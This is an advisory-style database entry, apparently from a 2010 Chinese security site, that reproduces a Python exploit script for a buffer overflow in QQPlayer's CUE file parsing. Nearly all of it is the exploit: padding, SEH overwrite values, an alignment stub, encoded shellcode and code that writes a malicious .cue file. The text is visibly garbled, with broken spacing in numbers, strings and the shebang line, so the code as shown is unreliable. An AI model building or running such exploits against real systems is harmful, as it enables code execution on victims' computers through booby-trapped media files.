QQPlayer CUE file buffer overflow vulnerability-vulnerability warning-the black bar safety net

2010-07-23T00:00:00
ID MYHACK58:62201027689
Type myhack58
Reporter 佚名
Modified 2010-07-23T00:00:00

Description

!/ usr/bin/env python

Title: QQPlayer cue File Buffer Overflow Exploit

Author: Lufeng Li of Neusoft Corporation

Vendor: www.qq.com

Platform: Windows XPSP3 Chinese Simplified

Tested: QQPlayer 2.3.696.400

Vulnerable: QQPlayer<=2.3.696. 400p1

Code :

head = """FILE""""

junk = "A" * 7 8 0

nseh ="\x42\x61\x21\x61"

seh ="\xa9\x9e\x41\x00"

adjust="\x32\x42\x61\x33\xca\x83\xc0\x10"

shellcode=("hffffk4diFkTpj02Tpk0T0AuEE2C4s4o0t0w174t0c7l0t0v7l2z1l131o2q1k2d1l081o"

"0v1o0a7O2r0T3w3e1P0a7o0a3Y3K0l3w038n5l0c5p8k354q2j8n5o00pyvtx10x41pz41"

"H4A4I1TA71TADVTZ32PZNBFZDQC02DQD0D13DJE2C5CJO1E0G1I4T1R2M0T1V7L1TKL2CK"

"NK0KN2EKL08KN1FKO1Q7LML2N3W46607K7N684H310I9W025DOL1S905A4D802Z5DOO01")

junk_="R"*8 0 0 0

foot =""". the avi" VIDEO"""+"\x0a""""TRACK 0 2 MODE1/8 8 8 8"""+"\x0a"+"INDEX 0 8 0 8:0 8:0 8"

payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot

fobj = open("poc. cue","w")

fobj. write(payload)

fobj. close()